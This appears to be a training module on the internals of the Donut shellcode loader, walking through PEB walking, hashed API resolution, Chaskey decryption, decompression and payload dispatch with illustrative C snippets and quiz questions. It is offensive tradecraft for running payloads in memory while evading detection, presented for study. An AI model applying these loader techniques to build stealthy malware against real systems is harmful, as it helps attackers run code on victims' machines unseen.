Module 5: The Donut Loader
Inside the position-independent shellcode loader: PEB walking, API resolution, decryption, decompression, and module-type dispatch.
Module Objective
Trace the complete execution flow of Donut’s PIC loader from the moment shellcode begins executing. Understand how it finds its own data via RIP-relative addressing, resolves Windows APIs by walking the PEB and hashing export names, decrypts the instance and module, and dispatches to the correct payload handler.
1. Position-Independent Code Constraints
Donut’s loader must execute from any address in memory with zero external dependencies at startup. This means:
- No global variables — all state is on the stack or in the
DONUT_INSTANCEstructure - No import table — every API must be resolved at runtime via PEB walking
- No absolute addresses — all data references use offsets from the current instruction pointer
- No string literals in the conventional sense — API names are stored as hashes, not plaintext
The loader is written in C and compiled with special flags to produce PIC output. The Donut build system compiles loader.c and its dependencies into a raw code blob that is position-independent.
2. Loader Entry Point
When the shellcode begins executing, the first thing the loader must do is find the DONUT_INSTANCE structure that follows the code. It uses a technique to determine its own address in memory:
C// The loader entry point in loader.c
// On x64, we can use RIP-relative addressing
// The DONUT_INSTANCE is appended immediately after the loader code
// Step 1: Determine our base address
// The instance offset is embedded as a constant during generation
PDONUT_INSTANCE inst = (PDONUT_INSTANCE)(
(BYTE*)_ReturnAddress() + instance_offset
);
// On x86, a call/pop trick is used:
// call $+5 ; push next instruction address
// pop eax ; eax = current EIP
// add eax, offset ; eax = address of DONUT_INSTANCE
Once the loader has a pointer to DONUT_INSTANCE, it has access to all configuration data, API hashes, and encryption keys.
3. PEB Walking for API Resolution
The core of PIC programming: finding loaded DLLs and their exports without calling any APIs. The Process Environment Block (PEB) contains a linked list of all loaded modules.
C// peb.c - Walk the PEB to find loaded DLLs and resolve exports
// Step 1: Access the PEB via the TEB
// x64: PEB is at gs:[0x60]
// x86: PEB is at fs:[0x30]
#if defined(_WIN64)
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif
// Step 2: Get the loader data (list of loaded modules)
PPEB_LDR_DATA ldr = peb->Ldr;
// Step 3: Walk the InMemoryOrderModuleList
// This doubly-linked list contains every loaded DLL
PLIST_ENTRY head = &ldr->InMemoryOrderModuleList;
PLIST_ENTRY entry = head->Flink;
while (entry != head) {
PLDR_DATA_TABLE_ENTRY mod = CONTAINING_RECORD(
entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks
);
// mod->BaseDllName is the DLL name (e.g., "kernel32.dll")
// mod->DllBase is the base address of the loaded DLL
// Now we can parse this DLL's export table...
entry = entry->Flink;
}
PEB Walking Chain
gs:[0x60] (x64)
fs:[0x30] (x86)
Process Environment Block
Loader data
Linked list of DLLs
Function addresses
4. Hash-Based Export Resolution
For each loaded DLL, the loader walks its Export Address Table (EAT) and computes a hash of each exported function name. When a hash matches one in the DONUT_INSTANCE.hash[] array, the function address is stored in the api structure.
C// Resolve exports from a DLL by hashing function names
VOID ResolveAPIs(PDONUT_INSTANCE inst, HMODULE dll) {
PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)dll;
PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)dll + dos->e_lfanew);
PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(
(BYTE*)dll + nt->OptionalHeader
.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
);
DWORD *names = (DWORD*)((BYTE*)dll + exp->AddressOfNames);
WORD *ordinals = (WORD*) ((BYTE*)dll + exp->AddressOfNameOrdinals);
DWORD *funcs = (DWORD*)((BYTE*)dll + exp->AddressOfFunctions);
for (DWORD i = 0; i < exp->NumberOfNames; i++) {
char *name = (char*)((BYTE*)dll + names[i]);
// Compute hash of this export name
ULONGLONG hash = ComputeHash(name);
// Check against all hashes in the instance
for (DWORD j = 0; j < DONUT_MAX_API; j++) {
if (inst->hash[j] == hash) {
// Found a match! Store the resolved address
WORD ord = ordinals[i];
FARPROC addr = (FARPROC)((BYTE*)dll + funcs[ord]);
((FARPROC*)&inst->api)[j] = addr;
}
}
}
}
The Hashing Algorithm
Donut uses a custom hash function (Maru hash) that combines the DLL name and function name into a single 64-bit value. This ensures that kernel32!VirtualAlloc and ntdll!VirtualAlloc (hypothetically) would produce different hashes. The hash includes both the DLL name and the function name to avoid collisions across modules.
5. Instance Decryption
After resolving the minimum required APIs, the loader decrypts the DONUT_INSTANCE. The decryption key is derived from a value embedded in the loader code at generation time:
C// Decrypt the DONUT_INSTANCE using Chaskey CTR mode
// The initial key and counter are stored in the loader code itself
chaskey_encrypt(
inst->key, // Chaskey key (128-bit)
inst->ctr, // Counter/nonce (128-bit)
(BYTE*)inst + offsetof(DONUT_INSTANCE, /* encrypted start */),
encrypted_size
);
// Verify integrity via MAC
DWORD mac = ComputeMAC(inst, inst_size);
if (mac != inst->mac) {
// Decryption failed or data corrupted - abort
return;
}
Once decrypted, the instance reveals the full API hash table, the module decryption key, bypass configuration, and all other runtime parameters.
6. Module Decryption and Decompression
With the instance decrypted and APIs resolved, the loader proceeds to decrypt and decompress the DONUT_MODULE:
C// Locate the module (either embedded or downloaded via staging)
PDONUT_MODULE mod;
if (inst->type == DONUT_INSTANCE_EMBED) {
// Module is embedded after the instance
mod = (PDONUT_MODULE)((BYTE*)inst + inst->mod_offset);
} else {
// Download the module via HTTP or DNS staging
mod = DownloadModule(inst);
}
// Decrypt the module with the module-specific key
chaskey_encrypt(
inst->mod_key,
inst->mod_ctr,
(BYTE*)mod,
inst->mod_len
);
// Decompress based on the compression engine
LPVOID payload = NULL;
if (mod->compress == DONUT_COMPRESS_APLIB) {
payload = inst->api.VirtualAlloc(NULL, mod->len, MEM_COMMIT, PAGE_READWRITE);
aP_depack(mod->data, payload);
} else if (mod->compress == DONUT_COMPRESS_LZNT1) {
payload = inst->api.VirtualAlloc(NULL, mod->len, MEM_COMMIT, PAGE_READWRITE);
ULONG final_size;
inst->api.RtlDecompressBuffer(
COMPRESSION_FORMAT_LZNT1,
payload, mod->len,
mod->data, mod->zlen,
&final_size
);
} else {
// No compression: data is the raw payload
payload = mod->data;
}
7. Module-Type Dispatch
After decryption and decompression, the loader checks the module type and calls the appropriate handler:
C// Dispatch based on module type
switch (mod->type) {
case DONUT_MODULE_NET_DLL:
case DONUT_MODULE_NET_EXE:
// .NET payload: host CLR, load assembly, invoke
RunDotNET(inst, mod, payload);
break;
case DONUT_MODULE_DLL:
case DONUT_MODULE_EXE:
// Native PE: map sections, relocate, resolve imports, execute
RunPE(inst, mod, payload);
break;
case DONUT_MODULE_VBS:
case DONUT_MODULE_JS:
case DONUT_MODULE_XSL:
// Script: create COM scripting engine, execute
RunScript(inst, mod, payload);
break;
}
Complete Loader Execution Flow
RIP-relative
Resolve APIs
Chaskey
Patch stubs
Chaskey
aPLib/LZNT1
PE/CLR/COM
8. Exit Handling
After the payload finishes executing, the loader must clean up and exit. The exit behavior is configurable via DONUT_INSTANCE.exit_opt:
| Exit Option | Constant | Behavior |
|---|---|---|
| Exit Thread | DONUT_OPT_EXIT_THREAD | Calls ExitThread(0) — only the current thread terminates |
| Exit Process | DONUT_OPT_EXIT_PROCESS | Calls ExitProcess(0) — the entire process terminates |
| No Exit | DONUT_OPT_EXIT_BLOCK | The loader returns normally, allowing the caller to continue |
Exit Option Matters
Choosing the wrong exit option can crash the target process or leave zombie threads. Exit Thread is safest for injection scenarios (the host process continues). Exit Process is useful for sacrificial processes. No Exit / Block is best when the loader is called from your own code and you want control to return.
Knowledge Check
1. How does the PIC loader find loaded DLLs without calling any Windows APIs?
2. Why does Donut use hash-based API resolution instead of plaintext strings?
3. What is the first thing the Donut loader must do after execution begins?